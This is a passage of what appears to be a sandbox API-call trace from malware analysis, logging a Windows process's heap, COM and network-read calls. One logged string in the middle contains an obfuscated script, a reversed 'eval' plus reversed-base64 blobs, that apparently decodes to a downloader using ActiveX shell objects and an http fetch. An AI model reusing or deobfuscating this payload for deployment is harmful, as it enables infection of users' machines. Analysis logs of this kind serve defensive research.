InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0188.075] OleUninitialize () [0188.075] DestroyWindow (hWnd=0x4031a) returned 1 [0188.075] NtdllDefWindowProc_W () returned 0x0 [0188.076] PostQuitMessage (nExitCode=0) [0188.076] NtdllDefWindowProc_W () returned 0x0 [0188.077] FreeLibrary (hLibModule=0x6d6d0000) returned 1 [0188.077] exit (_Code=0) [0188.089] free (_Block=0xc4ad98) [0188.089] free (_Block=0xc489d0) [0188.089] free (_Block=0xc5af88) [0188.089] free (_Block=0xc4a998) [0188.089] free (_Block=0xc4c3f8) [0188.089] free (_Block=0xbfcae8) [0188.122] DeleteAtom (nAtom=0xc005) returned 0x0 [0188.122] EtwEventUnregister () returned 0x0 [0188.122] EtwEventUnregister () returned 0x0 [0188.123] EtwEventUnregister () returned 0x0 [0188.123] free (_Block=0xbf7820) [0188.123] free (_Block=0xbfd720) [0188.131] GetCurrentThreadId () returned 0xb48 [0188.131] EtwEventUnregister () returned 0x0 [0188.132] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ea320 | out: hHeap=0x5e0000) returned 1 [0188.132] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fcc88 | out: hHeap=0x5e0000) returned 1 [0188.133] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f24c0 | out: hHeap=0x5e0000) returned 1 [0188.133] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602b30 | out: hHeap=0x5e0000) returned 1 [0188.133] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6420 | out: hHeap=0x5e0000) returned 1 [0188.133] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fcde8 | out: hHeap=0x5e0000) returned 1 [0188.133] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3778 | out: hHeap=0x5e0000) returned 1 [0188.133] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b60 | out: hHeap=0x5e0000) returned 1 [0188.133] FlushViewOfFile (lpBaseAddress=0x9660000, dwNumberOfBytesToFlush=0xbfe0) returned 1 [0188.134] UnmapViewOfFile (lpBaseAddress=0x9660000) returned 1 [0188.134] CloseHandle (hObject=0x684) returned 1 [0188.135] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0188.135] GetProcAddress (hModule=0x703b0000, lpProcName=0x1e8) returned 0x704295a0 [0188.135] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fb58 | out: lpflOldProtect=0x19fb58*=0x4) returned 1 [0188.136] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x692a40 | out: hHeap=0x5e0000) returned 1 [0188.137] EtwEventUnregister () returned 0x0 [0188.137] EtwEventUnregister () returned 0x0 [0188.137] EtwEventUnregister () returned 0x0 [0188.137] EtwEventUnregister () returned 0x0 [0188.137] EtwEventUnregister () returned 0x0 [0188.138] FindAtomW (lpString="{4653C0A4-2B2D-48DE-AB80-93910A28F900}") returned 0xc000 [0188.138] DeleteAtom (nAtom=0xc000) returned 0x0 [0188.138] LocalFree (hMem=0x0) returned 0x0 [0188.139] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f17f8 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1738 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1698 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f16f8 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1878 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1678 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1838 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1978 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9cf8 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f19d8 | out: hHeap=0x5e0000) returned 1 [0188.140] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f17d8 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f17b8 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1a98 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1a78 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1a38 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1ab8 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1a18 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9cc8 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1db8 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1d78 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1d38 | out: hHeap=0x5e0000) returned 1 [0188.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1d18 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1cf8 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1cd8 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1d98 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1a58 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9ea8 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1cb8 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1af8 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1c98 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1b58 | out: hHeap=0x5e0000) returned 1 [0188.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1c78 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1bf8 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1b38 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1c18 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9c38 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1bd8 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1bb8 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1c58 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1b18 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1b78 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1d58 | out: hHeap=0x5e0000) returned 1 [0188.143] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1ad8 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1b98 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9bd8 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1c38 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f12e8 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1488 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f12c8 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f13e8 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1508 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f13a8 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1368 | out: hHeap=0x5e0000) returned 1 [0188.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9c98 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f12a8 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1348 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1568 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1248 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1388 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1548 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1328 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1468 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9e48 | out: hHeap=0x5e0000) returned 1 [0188.145] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f14e8 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f14c8 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1428 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1228 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1448 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1288 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f15a8 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f15c8 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9ba8 | out: hHeap=0x5e0000) returned 1 [0188.146] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9d28 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f13c8 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1208 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1268 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1528 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1588 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1308 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f14a8 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f1408 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e9d58 | out: hHeap=0x5e0000) returned 1 [0188.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e6d98 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e6d78 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ea3b0 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ea810 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ea7f0 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ea410 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e71c0 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ea928 | out: hHeap=0x5e0000) returned 1 [0188.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ea308 | out: hHeap=0x5e0000) returned 1 [0188.149] FreeLibrary (hLibModule=0x703b0000) returned 1 [0188.149] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e66c8 | out: hHeap=0x5e0000) returned 1 [0188.150] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9660 | out: hHeap=0x5e0000) returned 1 [0188.152] FreeLibrary (hLibModule=0x65d40000) returned 1 [0188.152] free (_Block=0x8ce3b8) Thread: id = 31 os_tid = 0xebc Thread: id = 32 os_tid = 0xc94 [0130.562] GetCurrentThreadId () returned 0xc94 [0130.563] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x6dd9a820, phModule=0xe7ff0c | out: phModule=0xe7ff0c*=0x6d6d0000) returned 1 [0130.563] EtwEventActivityIdControl () returned 0x0 [0130.563] SetEvent (hEvent=0x210) returned 1 [0130.563] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0187.802] SetEvent (hEvent=0x210) returned 1 [0187.802] FreeLibraryAndExitThread (hLibModule=0x6d6d0000, dwExitCode=0x0) [0187.803] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0187.803] GetCurrentThreadId () returned 0xc94 Thread: id = 33 os_tid = 0xfe4 [0130.805] GetCurrentThreadId () returned 0xfe4 [0130.806] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x6dd9a820, phModule=0x667ff0c | out: phModule=0x667ff0c*=0x6d6d0000) returned 1 [0130.806] EtwEventActivityIdControl () returned 0x0 [0130.806] SetEvent (hEvent=0x21c) returned 1 [0130.806] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0187.804] SetEvent (hEvent=0x21c) returned 1 [0187.804] FreeLibraryAndExitThread (hLibModule=0x6d6d0000, dwExitCode=0x0) [0187.805] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0187.805] GetCurrentThreadId () returned 0xfe4 Thread: id = 34 os_tid = 0x4c8 [0130.824] GetCurrentThreadId () returned 0x4c8 [0130.824] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x6dd90a20, phModule=0x670fedc | out: phModule=0x670fedc*=0x6d6d0000) returned 1 [0130.824] EtwEventActivityIdControl () returned 0x0 [0130.824] SetEvent (hEvent=0x200) returned 1 [0130.879] GetCurrentThread () returned 0xfffffffe [0130.879] SetThreadPriority (hThread=0xfffffffe, nPriority=-1) returned 1 [0137.618] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x670fee4*=0x20c, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0187.779] SetEvent (hEvent=0x200) returned 1 [0187.779] FreeLibraryAndExitThread (hLibModule=0x6d6d0000, dwExitCode=0x0) [0187.780] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0187.781] GetCurrentThreadId () returned 0x4c8 Thread: id = 35 os_tid = 0x3ec [0131.897] GetCurrentThreadId () returned 0x3ec [0131.897] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x6dd5cca0, phModule=0x684ff7c | out: phModule=0x684ff7c*=0x6d6d0000) returned 1 [0131.898] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.898] GetProcAddress (hModule=0x76da0000, lpProcName="CoInitializeEx") returned 0x76df88d0 [0131.898] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x684fef0 | out: lpflOldProtect=0x684fef0*=0x4) returned 1 [0131.899] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0131.899] GetCurrentThreadId () returned 0x3ec [0131.899] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x615a40 [0131.899] memcpy_s (in: _Destination=0x615a40, _DestinationSize=0x1000, _Source=0x610c1c, _SourceSize=0xd12 | out: _Destination=0x615a40) returned 0x0 [0131.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610c10 | out: hHeap=0x5e0000) returned 1 [0131.900] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d822570*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x684fde4 | out: ppvObject=0x684fde4*=0x5f64f0) returned 0x0 [0131.900] IInternetProtocol:Read (in: This=0x5f64f0, pv=0x616752, cb=0x2ee, pcbRead=0x684fef4 | out: pv=0x616752, pcbRead=0x684fef4*=0x0) returned 0x1 [0131.900] IUnknown:Release (This=0x5f64f0) returned 0x2 [0131.901] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d822570*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x684fe00 | out: ppvObject=0x684fe00*=0x5f64f0) returned 0x0 [0131.901] IInternetProtocolRoot:Terminate (This=0x5f64f0, dwOptions=0x0) returned 0x0 [0131.901] IUnknown:Release (This=0x60bf88) returned 0x6 [0131.901] IUnknown:Release (This=0x60bfcc) returned 0x5 [0131.902] IUnknown:Release (This=0x5f64f0) returned 0x2 [0131.902] IUnknown:AddRef (This=0x5f64f0) returned 0x3 [0131.902] IUnknown:Release (This=0x5f64f0) returned 0x2 [0131.902] IUnknown:Release (This=0x5f64f0) returned 0x1 [0131.903] CoTaskMemFree (pv=0x60bfe0) [0131.903] GetCurrentThreadId () returned 0x3ec [0131.904] GetCurrentThreadId () returned 0x3ec [0131.904] GetCurrentThreadId () returned 0x3ec [0131.904] malloc (_Size=0x15c) returned 0xbfc958 [0131.906] memcpy_s (in: _Destination=0xd60000, _DestinationSize=0x1000, _Source=0x615a40, _SourceSize=0xd12 | out: _Destination=0xd60000) returned 0x0 [0131.907] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a2a) returned 0x616a50 [0131.907] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x615a40, cbMultiByte=3346, lpWideCharStr=0x616a54, cchWideChar=3346 | out: lpWideCharStr="
      lave
      2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic15GKiIXZnNndyNjMgMmOcxVdzVmczxFXwVnYsl2YcxFd1JWZHlmcsx0bhRmLqB3ZikyO
      ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
      \r\n") returned 3346 [0131.907] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x618488 [0131.908] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x208) returned 0x618598 [0131.908] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fd048 [0131.908] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x408) returned 0x6187a8 [0131.909] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fd048 | out: hHeap=0x5e0000) returned 1 [0131.909] GetCurrentThreadId () returned 0x3ec [0131.909] IUnknown:AddRef (This=0x5f5f5c) returned 0xe [0131.909] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x684fe04 | out: lpCPInfo=0x684fe04) returned 1 [0131.909] IUnknown:AddRef (This=0x5fc930) returned 0x5 [0131.909] IUnknown:AddRef (This=0x5f5f5c) returned 0xf [0131.909] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x684fdd8 | out: ppvObject=0x684fdd8*=0x5f5f5c) returned 0x0 [0131.910] IUnknown:Release (This=0x5f5f5c) returned 0xf [0131.910] IUnknown:AddRef (This=0x5f5f5c) returned 0x10 [0131.910] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fe1c | out: pdwScheme=0x684fe1c*=0x9) returned 0x0 [0131.910] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fdfc | out: pdwScheme=0x684fdfc*=0x9) returned 0x0 [0131.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x610c10 [0131.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8006) returned 0x618bb8 [0131.912] memcpy_s (in: _Destination=0x618bbc, _DestinationSize=0x8002, _Source=0x6181fa, _SourceSize=0x27e | out: _Destination=0x618bbc) returned 0x0 [0131.912] IUnknown:Release (This=0x5f5f5c) returned 0xf [0131.913] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4000) returned 0x620bc8 [0131.914] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x620bc8 | out: hHeap=0x5e0000) returned 1 [0131.914] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x611c20 [0131.914] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fcfc8 [0131.914] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fcfc8 | out: hHeap=0x5e0000) returned 1 [0131.914] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fcea8 [0131.914] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x208) returned 0x611d30 [0131.915] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fcea8 | out: hHeap=0x5e0000) returned 1 [0131.915] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fd128 [0131.915] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611c20 | out: hHeap=0x5e0000) returned 1 [0131.915] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fd128 | out: hHeap=0x5e0000) returned 1 [0131.915] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.916] GetProcAddress (hModule=0x76da0000, lpProcName="CoWaitForMultipleHandles") returned 0x76de6f50 [0131.916] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x684fed0 | out: lpflOldProtect=0x684fed0*=0x4) returned 1 [0131.916] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0132.278] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0132.548] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0132.869] GetCurrentThreadId () returned 0x3ec [0132.869] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x616752, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0132.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x62a5d0 [0132.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a5d0 | out: hHeap=0x5e0000) returned 1 [0132.869] GetCurrentThreadId () returned 0x3ec [0132.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611d30 | out: hHeap=0x5e0000) returned 1 [0132.870] HeapFree (in: hHeap=0x5e0000, 